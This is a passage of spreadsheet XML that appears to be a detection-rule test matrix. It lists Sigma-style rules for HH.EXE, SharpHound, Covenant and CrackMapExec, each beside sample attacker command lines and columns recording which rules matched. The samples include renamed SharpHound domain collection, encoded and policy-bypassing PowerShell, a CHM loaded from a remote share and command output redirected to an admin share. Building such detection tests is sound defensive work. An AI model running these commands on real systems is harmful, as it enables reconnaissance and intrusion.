        <v>0</v>
      </c>
      <c r="K1772" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1773" ht="15.75" customHeight="1" s="42">
      <c r="A1773" s="43" t="n"/>
      <c r="B1773" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1773" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1773" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1773" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1773" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1773" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1773" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1773" s="43" t="n"/>
      <c r="J1773" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1773" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1774" ht="15.75" customHeight="1" s="42">
      <c r="A1774" s="43" t="n"/>
      <c r="B1774" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1774" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1774" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1774" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1774" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1774" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1774" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1774" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1774" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1774" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1775" ht="15.75" customHeight="1" s="42">
      <c r="A1775" s="43" t="n"/>
      <c r="B1775" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1775" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1775" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1775" s="43" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1775" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1775" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1775" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1775" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1775" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1775" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1776" ht="15.75" customHeight="1" s="42">
      <c r="A1776" s="43" t="n"/>
      <c r="B1776" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1776" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1776" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1776" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1776" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1776" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1776" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1776" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1776" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1776" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1777" ht="15.75" customHeight="1" s="42">
      <c r="A1777" s="43" t="n"/>
      <c r="B1777" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1777" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1777" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1777" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1777" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1777" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1777" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I177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777" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1777" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1778" ht="15.75" customHeight="1" s="42">
      <c r="A1778" s="43" t="n"/>
      <c r="B1778" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1778" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1778" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1778" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F1778" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1778" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1778" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1778" s="43" t="n"/>
      <c r="J1778" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1778" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1779" ht="15.75" customHeight="1" s="42">
      <c r="A1779" s="43" t="n"/>
      <c r="B1779" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1779" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1779" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1779" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F1779" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1779" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1779" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1779" s="44" t="n"/>
      <c r="J1779" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1779" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1780" ht="15.75" customHeight="1" s="42">
      <c r="A1780" s="43" t="n"/>
      <c r="B1780" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1780" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1780" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1780" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F1780" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1780" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1780" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1780" s="43" t="n"/>
      <c r="J1780" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1780" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1781" ht="15.75" customHeight="1" s="42">
      <c r="A1781" s="43" t="n"/>
      <c r="B1781" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1781" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1781" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1781" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -e cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F1781" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1781" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1781" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1781" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1781" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1782" ht="15.75" customHeight="1" s="42">
      <c r="A1782" s="43" t="n"/>
      <c r="B1782" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1782" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1782" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1782" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -E cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F1782" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1782" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1782" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1782" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1782" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1783" ht="15.75" customHeight="1" s="42">
      <c r="A1783" s="43" t="n"/>
      <c r="B1783" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1783" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1783" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1783" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F1783" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1783" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1783" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1783" s="44" t="n"/>
      <c r="J1783" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1783" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1784" ht="15.75" customHeight="1" s="42">
      <c r="A1784" s="43" t="n"/>
      <c r="B1784" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1784" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1784" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1784" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F1784" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1784" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1784" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1784" s="43" t="n"/>
      <c r="J1784" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1784" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1785" ht="15.75" customHeight="1" s="42">
      <c r="A1785" s="43" t="n"/>
      <c r="B1785" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1785" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1785" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1785" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"C" 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F1785" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1785" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1785" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1785" s="43" t="n"/>
      <c r="J1785" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1785" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1786" ht="15.75" customHeight="1" s="42">
      <c r="A1786" s="43" t="n"/>
      <c r="B1786" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1786" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1786" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1786" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -noni -w 1 -exec bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1786" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1786" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1786" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1786" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1786" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1787" ht="15.75" customHeight="1" s="42">
      <c r="A1787" s="43" t="n"/>
      <c r="B1787" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1787" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1787" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1787" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOp -noni -w 1 -exec bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1787" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1787" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1787" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1787" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1787" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1788" ht="15.75" customHeight="1" s="42">
      <c r="A1788" s="43" t="n"/>
      <c r="B1788" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1788" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1788" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1788" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOP -noni -W 1 -exec bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1788" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1788" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1788" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1788" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1788" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1789" ht="15.75" customHeight="1" s="42">
      <c r="A1789" s="43" t="n"/>
      <c r="B1789" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1789" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1789" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1789" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1789" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1789" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1789" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1789" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1789" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1790" ht="15.75" customHeight="1" s="42">
      <c r="A1790" s="43" t="n"/>
      <c r="B1790" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1790" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1790" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1790" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F1790" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1790" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1790" s="4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J1790" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1790" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1791" ht="15.75" customHeight="1" s="42">
      <c r="A1791" s="43" t="n"/>
      <c r="B1791" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1791" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1791" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1791" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F1791" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1791" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1791" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J1791" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1791" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1792" ht="15.75" customHeight="1" s="42">
      <c r="A1792" s="43" t="n"/>
      <c r="B1792" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1792" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1792" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1792" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"C" "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F1792" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1792" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1792" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J1792" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1792" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1793" ht="15.75" customHeight="1" s="42">
      <c r="A1793" s="43" t="n"/>
      <c r="B1793" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1793" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1793" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1793" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"C" "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F1793" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1793" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1793" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J1793" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1793" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1794" ht="15.75" customHeight="1" s="42">
      <c r="A1794" s="43" t="n"/>
      <c r="B1794" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1794" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1794" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1794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794" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1794" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1794" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1794" s="43" t="n"/>
      <c r="J1794" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1794" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1795" ht="15.75" customHeight="1" s="42">
      <c r="A1795" s="43" t="n"/>
      <c r="B1795" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1795" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1795" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1795" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$a = 'j'; $b = 'o'; $c = 'i'; $d = 'n'; $e = 's'; $f = 'p'; $g = 'l'; $h = 'i'; $i = 't'; $cmd = $a+$b+$c+$d+' '+$e+$f+$g+$h+$i; Invoke-Expression ('Write-Host ' + $cmd)"</t>
        </is>
      </c>
      <c r="F1795" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1795" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1795" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1795" s="43" t="n"/>
      <c r="J1795" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1795" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1796" ht="15.75" customHeight="1" s="42">
      <c r="A1796" s="43" t="n"/>
      <c r="B1796" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1796" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1796" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1796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796" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1796" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1796" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1796" s="43" t="n"/>
      <c r="J1796" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1796" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1797" ht="15.75" customHeight="1" s="42">
      <c r="A1797" s="43" t="n"/>
      <c r="B1797" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1797" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1797" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1797" s="44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797" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1797" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1797" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1797" s="43" t="n"/>
      <c r="J1797" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1797" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1798" ht="15.75" customHeight="1" s="42">
      <c r="A1798" s="43" t="n"/>
      <c r="B1798" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1798" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1798" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1798" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1798" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1798" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1798" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1798" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1798" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1798" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1799" ht="15.75" customHeight="1" s="42">
      <c r="A1799" s="43" t="n"/>
      <c r="B1799" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1799" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1799" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
